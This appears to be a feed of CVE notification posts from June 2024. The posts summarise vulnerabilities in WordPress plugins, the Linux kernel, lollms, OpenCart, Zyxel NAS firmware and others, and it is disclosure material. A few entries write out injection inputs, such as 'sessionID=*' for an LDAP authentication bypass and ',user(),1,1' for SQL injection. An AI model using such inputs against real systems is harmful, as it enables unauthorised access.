🚨 CVE-2024-6239A flaw was found in the Poppler's Pdfinfo utility. This issue occurs when using -dests parameter with pdfinfo utility. By using certain malformed input files, an attacker could cause the utility to crash, leading to a denial of service.🎖@cveNotify |
|
| 2024-06-24 19:07:37 |
🚨 CVE-2024-37230Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Book Landing Page.This issue affects Book Landing Page: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-06-24 19:07:36 |
🚨 CVE-2024-37198Cross-Site Request Forgery (CSRF) vulnerability in blazethemes Digital Newspaper.This issue affects Digital Newspaper: from n/a through 1.1.5.🎖@cveNotify |
|
| 2024-06-24 19:07:35 |
🚨 CVE-2024-37118Cross Site Request Forgery (CSRF) vulnerability in Uncanny Owl Uncanny Automator Pro.This issue affects Uncanny Automator Pro: from n/a through 5.3.🎖@cveNotify |
|
| 2024-06-24 19:07:31 |
🚨 CVE-2022-45803Missing Authorization vulnerability in Nikolay Strikhar WordPress Form Builder Plugin – Gutenberg Forms.This issue affects WordPress Form Builder Plugin – Gutenberg Forms: from n/a through 2.2.8.3.🎖@cveNotify |
|
| 2024-06-24 19:07:30 |
🚨 CVE-2024-35776Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Exeebit phpinfo() WP.This issue affects phpinfo() WP: from n/a through 5.0.🎖@cveNotify |
|
| 2024-06-24 19:07:26 |
🚨 CVE-2024-36288In the Linux kernel, the following vulnerability has been resolved:SUNRPC: Fix loop termination condition in gss_free_in_token_pages()The in_token->pages[] array is not NULL terminated. This results inthe following KASAN splat: KASAN: maybe wild-memory-access in range [0x04a2013400000008-0x04a201340000000f]🎖@cveNotify |
|
| 2024-06-24 19:07:25 |
🚨 CVE-2024-35774Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in D’arteweb DImage 360 allows Stored XSS.This issue affects DImage 360: from n/a through 2.0.🎖@cveNotify |
|
| 2024-06-24 19:07:24 |
🚨 CVE-2024-35769Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in John West Slideshow SE allows Stored XSS.This issue affects Slideshow SE: from n/a through 2.5.17.🎖@cveNotify |
|
| 2024-06-24 18:37:25 |
🚨 CVE-2024-38662In the Linux kernel, the following vulnerability has been resolved:bpf: Allow delete from sockmap/sockhash only if update is allowedWe have seen an influx of syzkaller reports where a BPF program attached toa tracepoint triggers a locking rule violation by performing a map_deleteon a sockmap/sockhash.We don't intend to support this artificial use scenario. Extend theexisting verifier allowed-program-type check for updating sockmap/sockhashto also cover deleting from a map.From now on only BPF programs which were previously allowed to updatesockmap/sockhash can delete from these map types.🎖@cveNotify |
|
| 2024-06-24 18:37:24 |
🚨 CVE-2024-36481In the Linux kernel, the following vulnerability has been resolved:tracing/probes: fix error check in parse_btf_field()btf_find_struct_member() might return NULL or an error via theERR_PTR() macro. However, its caller in parse_btf_field() only checksfor the NULL condition. Fix this by using IS_ERR() and returning theerror up the stack.🎖@cveNotify |
|
| 2024-06-24 17:37:31 |
🚨 CVE-2024-6104go-retryablehttp prior to 0.7.7 did not sanitize urls when writing them to its log file. This could lead to go-retryablehttp writing sensitive HTTP basic auth credentials to its log file. This vulnerability, CVE-2024-6104, was fixed in go-retryablehttp 0.7.7.🎖@cveNotify |
|
| 2024-06-24 17:37:30 |
🚨 CVE-2024-38369XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The content of a document included using `{{include reference="targetdocument"/}}` is executed with the right of the includer and not with the right of its author. This means that any user able to modify the target document can impersonate the author of the content which used the `include` macro. This vulnerability has been patched in XWiki 15.0 RC1 by making the default behavior safe.🎖@cveNotify |
|
| 2024-06-24 17:37:26 |
🚨 CVE-2024-33880An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. It discloses full pathnames via Virto.SharePoint.FileDownloader/Api/Download.ashx?action=archive.🎖@cveNotify |
|
| 2024-06-24 17:37:25 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a LDAP injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the LDAP directory server, which may lead to escalation of privilege.🎖@cveNotify |
|
| 2024-06-24 17:37:24 |
🚨 CVE-2010-2739Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors.🎖@cveNotify |
|
| 2024-06-24 15:37:26 |
🚨 CVE-2024-6277A vulnerability, which was classified as critical, was found in lahirudanushka School Management System 1.0.0/1.0.1. Affected is an unknown function of the file student.php of the component Student Page. The manipulation of the argument update leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269490 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-24 15:37:25 |
🚨 CVE-2024-6267A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file system_info/index.php of the component System Info Page. The manipulation of the argument System Name/System Short Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269479.🎖@cveNotify |
|
| 2024-06-24 15:37:24 |
🚨 CVE-2024-33335SQL Injection vulnerability in H3C technology company SeaSQL DWS V2.0 allows a remote attacker to execute arbitrary code via a crafted file.🎖@cveNotify |
|
| 2024-06-24 14:37:39 |
🚨 CVE-2024-38384In the Linux kernel, the following vulnerability has been resolved:blk-cgroup: fix list corruption from reorder of WRITE ->lqueued__blkcg_rstat_flush() can be run anytime, especially when blk_cgroup_bio_startis being executed.If WRITE of `->lqueued` is re-ordered with READ of 'bisc->lnode.next' inthe loop of __blkcg_rstat_flush(), `next_bisc` can be assigned with onestat instance being added in blk_cgroup_bio_start(), then the locallist in __blkcg_rstat_flush() could be corrupted.Fix the issue by adding one barrier.🎖@cveNotify |
|
| 2024-06-24 14:37:38 |
🚨 CVE-2024-37026In the Linux kernel, the following vulnerability has been resolved:drm/xe: Only use reserved BCS instances for usm migrate exec queueThe GuC context scheduling queue is 2 entires deep, thus it is possiblefor a migration job to be stuck behind a fault if migration exec queueshares engines with user jobs. This can deadlock as the migrate execqueue is required to service page faults. Avoid deadlock by only usingreserved BCS instances for usm migrate exec queue.(cherry picked from commit 04f4a70a183a688a60fe3882d6e4236ea02cfc67)🎖@cveNotify |
|
| 2024-06-24 14:37:34 |
🚨 CVE-2024-36479In the Linux kernel, the following vulnerability has been resolved:fpga: bridge: add owner module and take its refcountThe current implementation of the fpga bridge assumes that the low-levelmodule registers a driver for the parent device and uses its owner pointerto take the module's refcount. This approach is problematic since it canlead to a null pointer dereference while attempting to get the bridge ifthe parent device does not have a driver.To address this problem, add a module owner pointer to the fpga_bridgestruct and use it to take the module's refcount. Modify the function forregistering a bridge to take an additional owner module parameter andrename it to avoid conflicts. Use the old function name for a helper macrothat automatically sets the module that registers the bridge as the owner.This ensures compatibility with existing low-level control modules andreduces the chances of registering a bridge without setting the owner.Also, update the documentation to keep it consistent with the new interfacefor registering an fpga bridge.Other changes: opportunistically move put_device() from __fpga_bridge_get()to fpga_bridge_get() and of_fpga_bridge_get() to improve code clarity sincethe bridge device is taken in these functions.🎖@cveNotify |
|
| 2024-06-24 14:37:33 |
🚨 CVE-2024-34030In the Linux kernel, the following vulnerability has been resolved:PCI: of_property: Return error for int_map allocation failureReturn -ENOMEM from of_pci_prop_intr_map() if kcalloc() fails to prevent aNULL pointer dereference in this case.[bhelgaas: commit log]🎖@cveNotify |
|
| 2024-06-24 14:37:32 |
🚨 CVE-2024-34027In the Linux kernel, the following vulnerability has been resolved:f2fs: compress: fix to cover {reserve,release}_compress_blocks() w/ cp_rwsem lockIt needs to cover {reserve,release}_compress_blocks() w/ cp_rwsem lockto avoid racing with checkpoint, otherwise, filesystem metadata includingblkaddr in dnode, inode fields and .total_valid_block_count may becorrupted after SPO case.🎖@cveNotify |
|
| 2024-06-24 14:37:29 |
🚨 CVE-2024-33847In the Linux kernel, the following vulnerability has been resolved:f2fs: compress: don't allow unaligned truncation on released compress inodef2fs image may be corrupted after below testcase:- mkfs.f2fs -O extra_attr,compression -f /dev/vdb- mount /dev/vdb /mnt/f2fs- touch /mnt/f2fs/file- f2fs_io setflags compression /mnt/f2fs/file- dd if=/dev/zero of=/mnt/f2fs/file bs=4k count=4- f2fs_io release_cblocks /mnt/f2fs/file- truncate -s 8192 /mnt/f2fs/file- umount /mnt/f2fs- fsck.f2fs /dev/vdb[ASSERT] (fsck_chk_inode_blk:1256) --> ino: 0x5 has i_blocks: 0x00000002, but has 0x3 blocks[FSCK] valid_block_count matching with CP [Fail] [0x4, 0x5][FSCK] other corrupted bugs [Fail]The reason is: partial truncation assume compressed inode has reservedblocks, after partial truncation, valid block count may change w/o.i_blocks and .total_valid_block_count update, result in corruption.This patch only allow cluster size aligned truncation on releasedcompress inode for fixing.🎖@cveNotify |
|
| 2024-06-24 14:37:28 |
🚨 CVE-2024-32936In the Linux kernel, the following vulnerability has been resolved:media: ti: j721e-csi2rx: Fix races while restarting DMAAfter the frame is submitted to DMA, it may happen that the submittedlist is not updated soon enough, and the DMA callback is triggeredbefore that.This can lead to kernel crashes, so move everything in a singlelock/unlock section to prevent such races.🎖@cveNotify |
|
| 2024-06-24 14:37:27 |
🚨 CVE-2024-29973** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-24 13:37:31 |
🚨 CVE-2024-4839A Cross-Site Request Forgery (CSRF) vulnerability exists in the 'Servers Configurations' function of the parisneo/lollms-webui, versions 9.6 to the latest. The affected functions include Elastic search Service (under construction), XTTS service, Petals service, vLLM service, and Motion Ctrl service, which lack CSRF protection. This vulnerability allows attackers to deceive users into unwittingly installing the XTTS service among other packages by submitting a malicious installation request. Successful exploitation results in attackers tricking users into performing actions without their consent.🎖@cveNotify |
|
| 2024-06-24 13:37:30 |
🚨 CVE-2024-37231Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Salon Booking System Salon booking system allows File Manipulation.This issue affects Salon booking system: from n/a through 9.9.🎖@cveNotify |
|
| 2024-06-24 13:37:26 |
🚨 CVE-2024-37111Missing Authorization vulnerability in Membership Software WishList Member X.This issue affects WishList Member X: from n/a through 3.25.1.🎖@cveNotify |
|
| 2024-06-24 13:37:25 |
🚨 CVE-2024-37107Improper Privilege Management vulnerability in Membership Software WishList Member X allows Privilege Escalation.This issue affects WishList Member X: from n/a through 3.25.1.🎖@cveNotify |
|
| 2024-06-24 13:37:24 |
🚨 CVE-2024-37092Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in StylemixThemes Consulting Elementor Widgets allows PHP Local File Inclusion.This issue affects Consulting Elementor Widgets: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-06-24 13:07:25 |
🚨 CVE-2020-27352When generating the systemd service units for the docker snap (and other similar snaps), snapd does not specify Delegate=yes - as a result systemd will move processes from the containers created and managed by these snaps into the cgroup of the main daemon within the snap itself when reloading system units. This may grant additional privileges to a container within the snap that were not originally intended.🎖@cveNotify |
|
| 2024-06-24 12:37:25 |
🚨 CVE-2024-37089Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in StylemixThemes Consulting Elementor Widgets allows PHP Local File Inclusion.This issue affects Consulting Elementor Widgets: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-06-24 12:37:24 |
🚨 CVE-2024-36038Zoho ManageEngine ITOM products versions from 128234 to 128248 are affected by the stored cross-site scripting vulnerability in the proxy server option.🎖@cveNotify |
|
| 2024-06-24 10:37:25 |
🚨 CVE-2024-6160SQL Injection vulnerability in MegaBIP software allows attacker to disclose the contents of the database, obtain session cookies or modify the content of pages. This issue affects MegaBIP software versions through 5.12.1.🎖@cveNotify |
|
| 2024-06-24 10:37:24 |
🚨 CVE-2024-29868Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.Users are recommended to upgrade to version 0.95.0, which fixes the issue.🎖@cveNotify |
|
| 2024-06-24 09:37:26 |
🚨 CVE-2024-5683Improper Control of Generation of Code ('Code Injection') vulnerability in Next4Biz CRM & BPM Software Business Process Manangement (BPM) allows Remote Code Inclusion.This issue affects Business Process Manangement (BPM): from 6.6.4.4 before 6.6.4.5.🎖@cveNotify |
|
| 2024-06-24 09:37:25 |
🚨 CVE-2024-36496The configuration file is encrypted with a static key derived from a static five-character password which allows an attacker to decrypt this file. The application hashes this five-character password with the outdated and broken MD5 algorithm (no salt) and uses the first five bytes as the key for RC4. The configuration file is then encrypted with these parameters.🎖@cveNotify |
|
| 2024-06-24 09:37:24 |
🚨 CVE-2024-36495The application Faronics WINSelect (Standard + Enterprise) saves its configuration in an encrypted file on the file system which "Everyone" has read and write access to, path to file:C:\ProgramData\WINSelect\WINSelect.wsdThe path for the affected WINSelect Enterprise configuration file is:C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd🎖@cveNotify |
|
| 2024-06-24 08:37:28 |
🚨 CVE-2024-27136XSS in Upload page in Apache JSPWiki 2.12.1 and priors allows the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.2 or later.🎖@cveNotify |
|
| 2024-06-24 08:37:27 |
🚨 CVE-2024-24554Bludit uses predictable methods in combination with the MD5 hashing algorithm to generate sensitive tokens such as the API token and the user token. This allows attackers to authenticate against the Bludit API.🎖@cveNotify |
|
| 2024-06-24 07:37:29 |
🚨 CVE-2024-4460A denial of service (DoS) vulnerability exists in zenml-io/zenml version 0.56.3 due to improper handling of line feed (`\n`) characters in component names. When a low-privileged user adds a component through the API endpoint `api/v1/workspaces/default/components` with a name containing a `\n` character, it leads to uncontrolled resource consumption. This vulnerability results in the inability of users to add new components in certain categories (e.g., 'Image Builder') and to register new stacks through the UI, thereby degrading the user experience and potentially rendering the ZenML Dashboard unusable. The issue does not affect component addition through the Web UI, as `\n` characters are properly escaped in that context. The vulnerability was tested on ZenML running in Docker, and it was observed in both Firefox and Chrome browsers.🎖@cveNotify |
|
| 2024-06-24 07:37:26 |
🚨 CVE-2024-24553Bludit uses the SHA-1 hashing algorithm to compute password hashes. Thus, attackers could determine cleartext passwords with brute-force attacks due to the inherent speed of SHA-1. In addition, the salt that is computed by Bludit is generated with a non-cryptographically secure function.🎖@cveNotify |
|
| 2024-06-24 07:37:25 |
🚨 CVE-2024-24550A security vulnerability has been identified in Bludit, allowing attackers with knowledge of the API token to upload arbitrary files through the File API which leads to arbitrary code execution on the server. This vulnerability arises from improper handling of file uploads, enabling malicious actors to upload and execute PHP files.🎖@cveNotify |
|
| 2024-06-24 07:37:24 |
🚨 CVE-2024-36039PyMySQL through 1.1.0 allows SQL injection if used with untrusted JSON input because keys are not escaped by escape_dict.🎖@cveNotify |
|
| 2024-06-24 06:37:25 |
🚨 CVE-2023-6717A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.🎖@cveNotify |
|
| 2024-06-24 06:37:24 |
🚨 CVE-2024-1249A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.🎖@cveNotify |
|
| 2024-06-24 05:37:25 |
🚨 CVE-2024-5676The Paradox IP150 Internet Module in version 1.40.00 is vulnerable to Cross-Site Request Forgery (CSRF) attacks due to a lack of countermeasures and the use of the HTTP method `GET` to introduce changes in the system.🎖@cveNotify |
|
| 2024-06-24 05:37:24 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a LDAP injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the LDAP directory server, which may lead to escalation of privilege.🎖@cveNotify |
|
| 2024-06-24 03:37:45 |
🚨 CVE-2024-6280A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269493 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-24 03:37:42 |
🚨 CVE-2024-6278A vulnerability has been found in lahirudanushka School Management System 1.0.0/1.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file subject.php of the component Subject Page. The manipulation of the argument update leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269491.🎖@cveNotify |
|
| 2024-06-24 03:37:41 |
🚨 CVE-2024-4499A Cross-Site Request Forgery (CSRF) vulnerability exists in the XTTS server of parisneo/lollms version 9.6 due to a lax CORS policy. The vulnerability allows attackers to perform unauthorized actions by tricking a user into visiting a malicious webpage, which can then trigger arbitrary LoLLMS-XTTS API requests. This issue can lead to the reading and writing of audio files and, when combined with other vulnerabilities, could allow for the reading of arbitrary files on the system and writing files outside the permitted audio file location.🎖@cveNotify |
|
| 2024-06-24 03:37:40 |
🚨 CVE-2024-36039PyMySQL through 1.1.0 allows SQL injection if used with untrusted JSON input because keys are not escaped by escape_dict.🎖@cveNotify |
|
| 2024-06-24 02:37:29 |
🚨 CVE-2024-6275A vulnerability classified as critical was found in lahirudanushka School Management System 1.0.0/1.0.1. This vulnerability affects unknown code of the file parent.php of the component Parent Page. The manipulation of the argument update leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269488.🎖@cveNotify |
|
| 2024-06-24 02:37:28 |
🚨 CVE-2024-6274A vulnerability classified as critical has been found in lahirudanushka School Management System 1.0.0/1.0.1. This affects an unknown part of the file /attendancelist.php of the component Attendance Report Page. The manipulation of the argument aid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269487.🎖@cveNotify |
|
| 2024-06-24 00:37:25 |
🚨 CVE-2024-3121A remote code execution vulnerability exists in the create_conda_env function of the parisneo/lollms repository, version 5.9.0. The vulnerability arises from the use of shell=True in the subprocess.Popen function, which allows an attacker to inject arbitrary commands by manipulating the env_name and python_version parameters. This issue could lead to a serious security breach as demonstrated by the ability to execute the 'whoami' command among potentially other harmful commands.🎖@cveNotify |
|
| 2024-06-24 00:37:24 |
🚨 CVE-2024-39337Click Studios Passwordstate Core before 9.8 build 9858 allows Authentication Bypass.🎖@cveNotify |
|
| 2024-06-23 23:37:24 |
🚨 CVE-2024-39334MENDELSON AS4 before 2024 B376 has a client-side vulnerability when a trading partner provides prepared XML data. When a victim opens the details of this transaction in the client, files can be written to the computer on which the client process is running. (The server process is not affected.)🎖@cveNotify |
|
| 2024-06-23 22:37:25 |
🚨 CVE-2024-6273A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as problematic. Affected by this vulnerability is the function save_patient of the file patient_side.php. The manipulation of the argument Full Name/Contact/Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269485 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-23 22:37:24 |
🚨 CVE-2024-39331In Emacs before 29.4, org-link-expand-abbrev in lisp/ol.el expands a %(...) link abbrev even when it specifies an unsafe function, such as shell-command-to-string. This affects Org Mode before 9.7.5.🎖@cveNotify |
|
| 2024-06-23 15:37:24 |
🚨 CVE-2024-4841A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest. By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint.🎖@cveNotify |
|
| 2024-06-23 12:37:24 |
🚨 CVE-2024-6269A vulnerability has been found in Ruijie RG-UAC 1.0 and classified as critical. This vulnerability affects the function get_ip.addr_details of the file /view/vpn/autovpn/sxh_vpnlic.php of the component HTTP POST Request Handler. The manipulation of the argument indevice leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269482 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-23 10:37:24 |
🚨 CVE-2024-6268A vulnerability, which was classified as critical, has been found in lahirudanushka School Management System 1.0.0/1.0.1. Affected by this issue is some unknown functionality of the file login.php of the component Login Page. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269480.🎖@cveNotify |
|
| 2024-06-23 09:37:25 |
🚨 CVE-2024-24549Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-06-23 09:37:24 |
🚨 CVE-2024-23672Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-06-23 06:37:24 |
🚨 CVE-2024-6267A vulnerability classified as problematic was found in SourceCodester Service Provider Management System 1.0. Affected by this vulnerability is an unknown functionality of the file system_info/index.php of the component System Info Page. The manipulation of the argument System Name/System Short Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269479.🎖@cveNotify |
|
| 2024-06-23 03:37:24 |
🚨 CVE-2024-6266A vulnerability classified as critical has been found in Pear Admin Boot up to 2.0.2. Affected is an unknown function of the file /system/dictData/loadDictItem. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269478 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-22 19:37:24 |
🚨 CVE-2024-38319IBM Security SOAR 51.0.2.0 could allow an authenticated user to execute malicious code loaded from a specially crafted script. IBM X-Force ID: 294830.🎖@cveNotify |
|
| 2024-06-22 17:37:24 |
🚨 CVE-2024-5443CVE-2024-4320 describes a vulnerability in the parisneo/lollms software, specifically within the `ExtensionBuilder().build_extension()` function. The vulnerability arises from the `/mount_extension` endpoint, where a path traversal issue allows attackers to navigate beyond the intended directory structure. This is facilitated by the `data.category` and `data.folder` parameters accepting empty strings (`""`), which, due to inadequate input sanitization, can lead to the construction of a `package_path` that points to the root directory. Consequently, if an attacker can create a `config.yaml` file in a controllable path, this path can be appended to the `extensions` list and trigger the execution of `__init__.py` in the current directory, leading to remote code execution. The vulnerability affects versions up to 5.9.0, and has been addressed in version 9.8.🎖@cveNotify |
|
| 2024-06-22 14:37:25 |
🚨 CVE-2024-6253A vulnerability was found in itsourcecode Online Food Ordering System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /purchase.php. The manipulation of the argument customer leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269420.🎖@cveNotify |
|
| 2024-06-22 14:37:24 |
🚨 CVE-2024-6241A vulnerability was found in Pear Admin Boot up to 2.0.2 and classified as critical. This issue affects the function getDictItems of the file /system/dictData/getDictItems/. The manipulation with the input ,user(),1,1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269375.🎖@cveNotify |
|
| 2024-06-22 12:37:25 |
🚨 CVE-2024-6252A vulnerability has been found in Zorlan SkyCaiji up to 2.8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Task Handler. The manipulation of the argument onerror leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269419.🎖@cveNotify |
|
| 2024-06-22 12:37:24 |
🚨 CVE-2024-6251A vulnerability, which was classified as problematic, was found in playSMS 1.4.3. Affected is an unknown function of the file /index.php?app=main&inc=feature_phonebook&op=phonebook_list of the component New Phonebook Handler. The manipulation of the argument name/email leads to basic cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-269418 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-22 09:37:24 |
🚨 CVE-2024-38379Apache Allura's neighborhood settings are vulnerable to a stored XSS attack. Only neighborhood admins can access these settings, so the scope of risk is limited to configurations where neighborhood admins are not fully trusted.This issue affects Apache Allura: from 1.4.0 through 1.17.0.Users are recommended to upgrade to version 1.17.1, which fixes the issue.🎖@cveNotify |
|
| 2024-06-22 06:37:25 |
🚨 CVE-2024-4940An open redirect vulnerability exists in the gradio-app/gradio, affecting the latest version. The vulnerability allows an attacker to redirect users to arbitrary websites, which can be exploited for phishing attacks, Cross-site Scripting (XSS), Server-Side Request Forgery (SSRF), amongst others. This issue is due to improper validation of user-supplied input in the handling of URLs. Attackers can exploit this vulnerability by crafting a malicious URL that, when processed by the application, redirects the user to an attacker-controlled web page.🎖@cveNotify |
|
| 2024-06-22 06:37:24 |
🚨 CVE-2024-3593The UberMenu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.3. This is due to missing or incorrect nonce validation on the ubermenu_delete_all_item_settings and ubermenu_reset_settings functions. This makes it possible for unauthenticated attackers to delete and reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-22 05:37:30 |
🚨 CVE-2024-21519This affects versions of the package opencart/opencart from 4.0.0.0. An Arbitrary File Creation issue was identified via the database restoration functionality. By injecting PHP code into the database, an attacker with admin privileges can create a backup file with an arbitrary filename (including the extension), within /system/storage/backup.**Note:**It is less likely for the created file to be available within the web root, as part of the security recommendations for the application suggest moving the storage path outside of the web root.🎖@cveNotify |
|
| 2024-06-22 05:37:26 |
🚨 CVE-2024-21517This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the redirect parameter of customer account/login route. An attacker can inject arbitrary HTML and Javascript into the page response. As this vulnerability is present in the account functionality it could be used to target and attack customers of the OpenCart shop.**Notes:**1) The fix for this vulnerability is incomplete🎖@cveNotify |
|
| 2024-06-22 05:37:25 |
🚨 CVE-2024-21515This affects versions of the package opencart/opencart from 4.0.0.0. A reflected XSS issue was identified in the filename parameter of the admin tool/log route. An attacker could obtain a user's token by tricking the user to click on a maliciously crafted URL. The user is then prompted to login and redirected again upon authentication with the payload automatically executing. If the attacked user has admin privileges, this vulnerability could be used as the start of a chain of exploits like Zip Slip or arbitrary file write vulnerabilities in the admin functionality.**Notes:**1) This is only exploitable if the attacker knows the name or path of the admin directory. The name of the directory is "admin" by default but there is a pop-up in the dashboard warning users to rename it.2) The fix for this vulnerability is incomplete. The redirect is removed so that it is not possible for an attacker to control the redirect post admin login anymore, but it is still possible to exploit this issue in admin if the user is authenticated as an admin already.🎖@cveNotify |
|
| 2024-06-22 05:37:24 |
🚨 CVE-2024-21514This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.🎖@cveNotify |
|
| 2024-06-22 04:37:25 |
🚨 CVE-2024-5965The Mosaic theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘link’ parameter within the theme's Button shortcode in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-22 04:37:24 |
🚨 CVE-2024-29973** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-22 02:37:26 |
